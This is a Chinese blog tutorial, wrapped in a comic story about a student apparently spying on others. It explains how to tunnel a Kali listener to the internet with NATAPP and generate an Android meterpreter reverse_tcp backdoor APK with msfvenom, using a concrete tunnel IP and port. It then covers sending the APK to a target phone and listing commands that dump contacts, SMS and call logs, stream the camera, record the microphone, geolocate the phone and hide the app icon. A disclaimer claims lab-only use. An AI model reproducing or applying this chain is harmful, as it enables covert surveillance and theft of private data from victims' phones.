外网监听安卓——未知网络的隐患
特此声明:
此分享只用于局域网安全测试以及无线网络工作原理的学习,不可用于有损于他人的局域网正常工作及网络安全*
此分享中的所有局域网测试都在私人网络环境中进行,未对他人的正常生活造成干扰
话接上回,自从二狗子的隔壁少了些许吵杂以后,每日的闲暇使得二狗子猛然觉得,这本就方寸之地,在这白昼与黑夜之间切换又开始变得索然无味了。二狗子觉得该干点什么。。。他在那张凌乱不堪的桌子上静静的等着,就如同以为以猎物的方式出现的猎人一般。
最近二狗子迷上一款“我只是帮朋友看看“的这么一款软件。若要说起这款软件从何而来,还得从他的舍友口中得知。
据二狗子的舍友提起,自从二狗子本人从前段封校的那段时间开始,由于无聊,便在好奇心的趋势下,加入了一群聊。并常常抱着手机在群聊中无声的偷笑,在群外放声的傻笑。就这样,某天在各种言语的渲染之下,二狗子的手被自己”附魔“一般,主动点开了被一堆文字与表情包裹,那最显眼的蓝色链接。。。。。
二狗子你听说了吗?舍友吃饭间,抬头向一旁正在一边吃着饭,一边眼睛死死盯住发着微光手机屏的二狗子问道,”前段时间好像三楼有一小伙被”诈骗“了,还好像通过什么手机里面有个什么马的玩意,哈哈!记得历史课上还提到过一次”特洛伊木马“,算了我也不懂“。
此时的二狗子,突然咬断了刚送进口中,但半截还在碗中的拉面。猛然间他使劲按了一下安卓手机电源键,关上了手机屏,快速的起身一边把左手的手机装进右手边的裤兜里,一边给舍友道别说到,”哎,你们先吃哈,我有点事,得去趟宿舍。“,这话还没说到一半,只见人已经把碗筷放到餐具回收处,在餐厅的门口只留下了一个背影。
他的两三个舍友嘴中未下咽的米饭,混合着吱吱呀呀的闲聊,只能熙熙攘攘的听到一句。”这小子呀,估计去收网去了。“就在这句话刚说出口的那一瞬间,餐厅又好像瞬刻安静,但又以常人察觉不到的瞬间又恢复了他们几人刚进来的那种状态。
局域网监听系统:kali-2021.3
虚拟机:VMware-16-pro
隧道搭建软件:Linux64bit NATAPP-PHP客户端
安卓版本:Android 10
隧道搭建
-
为了更加真实的模拟,使设备可以脱离局域网不受空间的限制。我们就需要搭建一个内网穿透的隧道,实现的原理大致就是。安卓端与监听终端由于ip是独立内网中无法被暴露,所以我们就需要一个中转的桥梁或隧道,而NATAPP就是一个可以独立于Linux端的客户端,通过NATAPP的隧道搭建,即就可以实现,上述目的。关于内网穿透,其实在那篇关于 Linux外网远程登录访问内网主机 的文章中就有提到过有兴趣的可以瞅瞅哈。
{% btn 'https://peggy-m.top/2021/11/1/linux-wai-wang-yuan-cheng-deng-lu-fang-wen-nei-wang-zhu-ji/ ', Linux外网远程登录访问内网主机,far fa-hand-point-right,purple larger %}
-
NATAPP客户端下载安装
- 隧道搭建这里推荐一款网上使用率较高的软件NATAPP,之前在 {% label Linux外网远程登录访问内网主机 orange %} 的这篇文章中采用的是花生壳,但这款软件搭建起来步骤比较繁琐,
登录NATAPP官网 NATAPP
- 这里只需要下载对应的版本即可
-
找到更目录的下载位置,直接复制,粘贴到虚拟机中的Kali中即可。
- NATAPP隧道配置
- 登录NATAPP官网,购买免费隧道
-
登录NATAPP官网,购买免费隧道并配置隧道协议为TCP
-
查看本地Kali的ip地址,在kali终端中输入ifconfig本地ip
-
在配置面板,进行隧道配置
-
启动NATAPP,查看服务器ip
- 输入语句
./natapp -authtoken=***************
************************************代表的为NATAPP控制面板中authtoken密匙
-
此时便可以在终端中看到以下结果(这个终端不可以关闭,相当于一个中转)
-
在Windows端的CMD命令中输入指令
ping server.natappfree.cc
-
此时我们便自爱CMD端得到了一个IP地址,该IP地址就是“隧道”,我们随后便就通过这条“隧道”在局域网外监控安卓端
-
开始生成安卓小马
- 输入以下代码(相当于搭建本地生成一个可以与natapp服务器对接的安卓端木马软件)
msfvenom -p android/meterpreter/reverse_tcp LHOST=112.74.89.58 LPORT=38573 R > android_backdoor.apk #android
LHOST:这里是我们隧道的IP地址 112.74.89.58
LPORT:这里是我们隧道的端口号 38573
android_backdoor.apk:生成APK的名称 默认生成目录在家目录中
- 把刚才生成的小马发送给需要监控的安卓端
- 开始远程监控
- 启动 msfconsole
- 在终端输入 msfconsole
-
然后依次输入以下命令(设置本地监听的地址与端口)
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.188.135 本地kali地址 set lport 55555 run
-
此时就已经开启了远程渗透监听,现在只需要在安卓端点击一下小马软件即可。
-
当然在点击以后软件并不会打开,只是在后台运行
- 指令测试
- 远程导出手机信息
-
开启手机摄像头
通过上面的测试,大家应该可以感受到,其实在这个数据与网络编制的新时代,虽然我们在享受利用着网络带来的各种便捷,但同时在某方面也增大了我们个人隐私的安全隐患。
所以提醒大家,尽量不要随意连接未知的不明WiFi,更不要浏览非法网站,通过非正规的网站下载应用app。或许你在追求快乐与刺激的同时,摄像头的那边正有一双眼睛盯着你的一切。
当然这里只是一个简单的测试,现在的手机在安全隐私方面都比较强。上述测试中所用到的软件,很难对窃取到他人的隐私。软件只用于测试,不会用于非法用途,天网恢恢。
测试常用指令
webcam_list 列出网络摄像头
sysinfo查看手机信息
webcam_stream开启摄像头
dump_contacts导出电话号码
dump_sms导出短信信息
webcam_snap通过摄像头拍照功能
record_mic [ˈrekərd]/记录/ 从默认麦克风录制音频为X秒
webcam_chat 开始视频聊天
webcam_snap 从指定的摄像头获取快照
webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头]
activity_start 从URI字符串启动Android活动
check_root 检查设备是否有根
dump_calllog 获取调用日志
dump_contacts 获取联系人列表
dump_sms 获取短信
geolocate 利用地理定位获取当前LAT
wlan_geolocate 利用WLAN信息获取当前LAT
hide_app_icon 从发射器隐藏应用程序图标
interval_collect 管理区间收集能力
send_sms 从目标会话发送短消息
set_audio_mode
sqlite_query 从存储库查询SQLite数据库
wakelock 启用/禁用Wakelock